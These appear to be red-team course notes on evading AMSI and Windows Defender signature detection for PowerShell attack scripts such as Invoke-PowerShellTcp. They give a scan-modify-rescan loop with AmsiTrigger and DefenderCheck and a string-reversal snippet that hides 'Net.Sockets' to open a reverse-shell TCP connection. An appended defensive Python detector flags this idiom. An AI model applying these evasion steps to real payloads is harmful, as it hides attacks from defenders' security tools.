PowerShell Scripts

Use AMSITrigger to find the exact part of the script that was detected

Use DefenderCheck to find the code and strings in a binary that Windows Defender (WD) may flag

AmsiTrigger_x64.exe -i C:\AD\Tools\Invoke-PowerShellTcp_Detected.ps1
DefenderCheck.exe PowerUp.ps1

Steps to avoid signature based detection:

  1. Scan using AMSITrigger

  2. Modify the detected code snippet

    1. Reverse strings

    2. Modify other words

  3. Rescan using AMSITrigger

  4. Repeat steps 2 and 3 until the result is “AMSI_RESULT_NOT_DETECTED” or “Blank”

Reverse example (the string "Net.Sockets" is stored backwards and rebuilt at run time; $Reverse, $IPAddress and $Port are parameters of the surrounding script)

$String = "stekcoS.teN"   # "Net.Sockets" reversed
# Read the characters right to left and join them back into the original type name
$class = ([regex]::Matches($String, '.', 'RightToLeft') | ForEach-Object { $_.Value }) -join ''
if ($Reverse)
{
    $client = New-Object System.$class.TCPClient($IPAddress, $Port)
}
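From the defender's side, here is an added example (not part of the original notes) in Python that scans script text for the RightToLeft reversal idiom shown above, recovers the stored literal by reversing it, and reports whether the recovered string contains names a reviewer would want to see in the clear. The sample script and the watchlist are constructed for this example.

```python
import re

# Idiom from the notes: a reversed literal rebuilt with [regex]::Matches(..., 'RightToLeft') -join ''
RIGHT_TO_LEFT = re.compile(
    r"\[regex\]::Matches\(\s*\$(\w+)\s*,\s*'\.'\s*,\s*'RightToLeft'\s*\)", re.IGNORECASE
)
# Simple string literal assignment: $name = "value" or $name = 'value'
ASSIGNMENT = re.compile(r"\$(\w+)\s*=\s*[\"']([^\"']+)[\"']")

# Constructed watchlist: names that a benign script would not normally store backwards
WATCHLIST = ("Net.Sockets", "TCPClient", "GetStream", "Invoke-Expression")

# Constructed sample mirroring the snippet in the notes (PowerShell variables are case-insensitive)
SAMPLE_SCRIPT = '''
$String =
"stekcoS.teN"
$class = ([regex]::Matches($String,'.',
'RightToLeft') | ForEach
{$_.value}) -join ''
$client = New-Object System.$class.TCPClient($IPAddress,$Port)
'''


def find_reversed_literals(script: str) -> list:
    """Return one finding per variable whose literal is rebuilt with the RightToLeft idiom."""
    literals = {name.lower(): value for name, value in ASSIGNMENT.findall(script)}
    findings = []
    for var in RIGHT_TO_LEFT.findall(script):
        literal = literals.get(var.lower())
        if literal is None:
            continue  # reversed variable is not a plain string literal; nothing to recover
        recovered = literal[::-1]
        hits = [token for token in WATCHLIST if token.lower() in recovered.lower()]
        findings.append(
            {"variable": var, "literal": literal, "recovered": recovered, "watchlist_hits": hits}
        )
    return findings


if __name__ == "__main__":
    for finding in find_reversed_literals(SAMPLE_SCRIPT):
        print(finding)
```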

Use Invoke-Obfuscation for full obfuscation of PowerShell scripts
